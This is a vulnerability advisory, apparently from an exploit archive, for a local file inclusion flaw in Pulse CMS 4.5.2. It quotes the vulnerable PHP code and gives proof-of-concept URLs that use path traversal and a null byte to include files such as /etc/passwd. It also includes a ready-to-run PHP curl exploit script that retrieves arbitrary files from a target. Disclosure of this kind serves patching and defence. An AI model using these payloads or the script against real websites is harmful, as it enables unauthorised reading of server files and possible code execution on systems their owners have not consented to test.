Pulse CMS 4.5.2 Local File Inclusion



EKU-ID: 5427 CVE: OSVDB-ID:
Author: Ehsan Hosseini Published: 2016-03-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion


References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt


Release Date:
=============
2016-02-28


Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content
managed website. Since it's a flat file CMS there is no complicated
database setup, just copy it to your server and
go.(https://www.pulsecms.com/)


Software Link:
==============
http://www.pulsecms.com/download/pulse.zip


Vulnerability Type:
=========================
Local File Inclusion


Vulnerability Details:
==============================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High

Vulnerable File & Code:
=======================
index.php
9	$page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
10	$page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
11
12	if (preg_match("/\//", $page)){
13		if(file_exists("content/pages/".$page."home.txt")){
14			$page = $page."home";
15		}
16	}
27	include("content/pages/$page.txt");

Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php

-- For include other type files use null byte nullbyte --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php

PHP Exploit
<?php
# index.php

$target = $argv[1];
$file = $argv[2];

// page : index.php
echo "Pulse CMS 4.5.2 - Local File Inclusion\n";
echo "Author : Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$ex = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $ex;
?>

Author:
==================
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/


SPX tnx to:
===========
Bl4ck_mohajem


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir